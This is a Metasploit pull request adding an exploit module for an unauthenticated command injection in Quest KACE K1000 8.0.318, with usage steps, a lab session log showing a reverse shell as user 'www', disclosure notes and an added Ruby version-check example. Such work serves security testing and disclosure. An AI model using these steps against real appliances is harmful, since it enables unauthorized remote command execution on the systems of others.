
Add Quest KACE Systems Management Command Injection #10199

Merged
merged 3 commits into from
Jun 26, 2018

Conversation

bcoles
Contributor

@bcoles bcoles commented Jun 22, 2018

Add Quest KACE Systems Management Command Injection exploit module.

     This module exploits a command injection vulnerability in Quest KACE
     Systems Management Appliance version 8.0.318 (and possibly prior).

     The `download_agent_installer.php` file allows unauthenticated users
     to execute arbitrary commands as the web server user `www`.

     A valid Organization ID is required. The default value is `1`.

     A valid Windows agent version number must also be provided. If file
     sharing is enabled, the agent versions are available within the
     `\\kace.local\client\agent_provisioning\windows_platform` Samba share.
     Additionally, various agent versions are listed on the KACE website.

     This module has been tested successfully on Quest KACE Systems
     Management Appliance K1000 version 8.0 (Build 8.0.318).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/unix/http/quest_kace_systems_management_rce
  • set ORGANIZATION 1
  • set AGENT_VERSION 8.0.152
  • run
  • Verify you get a shell

Scenarios

msf5 > use exploit/unix/http/quest_kace_systems_management_rce 
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.191.192
rhost => 172.16.191.192
msf5 exploit(unix/http/quest_kace_systems_management_rce) > check
[*] 172.16.191.192:80 The target appears to be vulnerable.
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1
ORGANIZATION => 1
set AGENT_VERSION 8.0.152
AGENT_VERSION => 8.0.152
msf5 exploit(unix/http/quest_kace_systems_management_rce) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Sending payload (505 bytes)
[+] Payload executed successfully
[!] Tried to delete /tmp/agentprov/1#;/, unknown result

492648046
kYWSsqpLmmERqEpLazwFOTzulPvsvShY
/kbox/kboxwww/common
EfiuBIzdwhsSLfEpgHrRjbgjszjCkfhf
ZGtYicImqwCnmUNGBZTpqDSPXojYXjkd
jCmxJgLnffuOAlsAFmWygrbOhCWPCNzD
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD k1000 11.0-RELEASE-p12 FreeBSD 11.0-RELEASE-p12 #0: Wed Aug  9 10:03:39 UTC 2017     root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  amd64
^C
Abort session 1? [y/N]  y

[*] 172.16.191.192 - Command shell session 1 closed.  Reason: User exit

@bcoles
Contributor Author

bcoles commented Jun 22, 2018

These issues were reported to the vendor about 4 months ago.

A hotfix for these issues was made public a little over two months ago and subsequently rolled into appliance updates.

hotfix notes

Vulnerability details, including proof-of-concept, have been public for over 3 weeks.

The advisory does not make clear the simplicity with which these issues can be exploited. In particular, the unauthenticated remote command injection vulnerability is easily exploitable, as demonstrated by this module.

This exploit is not fully automated. Knowledge of a valid organization ID and agent version are required. The check method can be used to passively infer the security posture of the appliance by comparing the appliance version against a list of patched versions.
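The passive `check` described in the comment above compares an appliance version string against a table of fixed builds. The following is an added illustration of that comparison logic in plain Ruby; it is not the module's code, and the fixed-build table it uses is a constructed placeholder (the real patched builds are in the vendor's hotfix notes, which the page does not reproduce). The point it makes is that version strings must be compared numerically, segment by segment: a naive string comparison ranks `8.0.318` below `8.0.52`, which would mark a vulnerable build as safe.

```ruby
# Added example of a passive version check, not the Metasploit module's code.
# FIXED_BUILDS holds hypothetical values for illustration only.

# Turn "8.0.318" (or "8.0.318 (Build 8.0.318)") into [8, 0, 318].
# Returns nil when the string does not start with a dotted number.
def parse_version(str)
  m = str.to_s.match(/\A(\d+(?:\.\d+)*)/)
  return nil unless m
  m[1].split('.').map(&:to_i)
end

# Numeric, segment-wise comparison; missing trailing segments count as 0,
# so "8.0" == "8.0.0". Returns -1, 0 or 1 like <=>.
def compare_versions(a, b)
  va = parse_version(a)
  vb = parse_version(b)
  raise ArgumentError, "unparseable version: #{a.inspect} / #{b.inspect}" if va.nil? || vb.nil?
  [va.size, vb.size].max.times do |i|
    c = (va[i] || 0) <=> (vb[i] || 0)
    return c unless c.zero?
  end
  0
end

# Constructed placeholder table: for each major.minor branch, the first
# build assumed to carry the fix. Hypothetical numbers, not Quest's real ones.
FIXED_BUILDS = {
  [8, 0] => '8.0.320',
  [8, 1] => '8.1.108',
}.freeze

# Mirrors the three outcomes a Metasploit check method would report:
#   :appears  - build is older than the first fixed build on its branch
#   :safe     - build is at or past the fix on its branch
#   :unknown  - version unparseable, or branch not covered by the table
def check_version(version)
  v = parse_version(version)
  return :unknown if v.nil?
  fixed = FIXED_BUILDS[v[0, 2]]
  return :unknown if fixed.nil?
  compare_versions(version, fixed) < 0 ? :appears : :safe
end

if __FILE__ == $PROGRAM_NAME
  ['8.0.318', '8.0.320', '8.1.100', '9.0.1', 'n/a'].each do |ver|
    puts "#{ver.ljust(8)} -> #{check_version(ver)}"
  end
end
```

A passive check of this kind only says whether the appliance reports a build older than the fix; it does not confirm exploitability, which still requires a valid organization ID and agent version, as the comment notes. Returning `:unknown` for a branch the table does not cover avoids the false reassurance of treating an unlisted newer branch as patched.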

@wchen-r7
Contributor

Understood. Thank you.

So I downloaded k1000-ovf_80.zip this morning from the official website, looks like they posted it on Dec 15 2017. Do we have to worry about auto-update when we spin up this appliance? Thanks.

@wvu
Contributor

wvu commented Jun 22, 2018

@wchen-r7: You could set networking to host-only unless the update is mandatory.

@wchen-r7
Contributor

Gotcha. Thanks!

@bcoles
Contributor Author

bcoles commented Jun 23, 2018

I had no issues with auto-updates. I also didn't test the hotfix.

@space-r7 space-r7 merged commit 6d3c141 into rapid7:master Jun 26, 2018
@space-r7
Contributor

Release Notes

Add an exploit module that exploits a command injection vulnerability in Quest KACE Systems Management Appliance version 8.0.318.

@wvu
Contributor

wvu commented Jun 26, 2018

@space-r7: If you did any repro, please post logs and/or notes here. Thanks!

@bcoles bcoles deleted the quest_kace_systems_management_rce branch June 26, 2018 15:23
5 participants